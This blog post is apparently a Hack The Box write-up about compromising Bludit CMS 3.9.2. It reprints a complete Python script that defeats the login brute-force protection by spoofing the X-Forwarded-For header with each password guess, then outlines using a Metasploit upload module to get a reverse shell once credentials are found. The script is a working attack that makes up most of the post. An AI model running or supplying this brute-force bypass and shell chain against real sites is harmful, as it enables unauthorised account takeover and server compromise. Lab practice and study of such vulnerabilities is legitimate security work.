So this post will describe a how to bypass protection in Bludit CMS v. 3.9.2 that is if you have a username. After managing to find the password I will discuss what metasploit module can help you to get a reverse shell. So, lets begin.
If we check the documentation that Bludit provides we can see how they are preventing brute force attacks. Here is a screenshot and the link if you want to read through the whole documentation.
https://docs.bludit.com/en/security/brute-force-protection
After some googling I found a script that I just edited. I will post the script here and the link to the original article.
https://rastating.github.io/bludit-brute-force-mitigation-bypass/
What you will need to change is how you give it the wordlist, and of course the IP address. The code bellow is a copy from rastating, so you can check his page as well and show him some love.
#!/usr/bin/env python3
import re
import requests
host = 'http://192.168.194.146/bludit'
login_url = host + '/admin/login'
username = 'admin'
wordlist = []
# Generate 50 incorrect passwords
for i in range(50):
wordlist.append('Password{i}'.format(i = i))
# Add the correct password to the end of the list
wordlist.append('adminadmin')
for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p = password))
headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u = username, p = password))
print()
break
After running this script with the desired user name and a password list, if you are lucky you will get the password. That means you can login with that user and look around.
So lets talk now how to get a reverse shell if you have the username and password. There are 2 ways from what I know. The first one is to upload a php reverse shell hidden in a image or the one I used is a Metasploit module. A quick google search will lead you to this Rapid7 link:
https://www.rapid7.com/db/modules/exploit/linux/http/bludit_upload_images_exec
So lets do the setup…
So not whats left to do is to set BLUDITPASS, BLUDITUSER, RHOST and RPORT with your desired values. When done just “run” and you are in.
This method is tested on one of the active boxes on HTB. The write up of that box you can find here, although I am going to keep it locked until the box is retired.
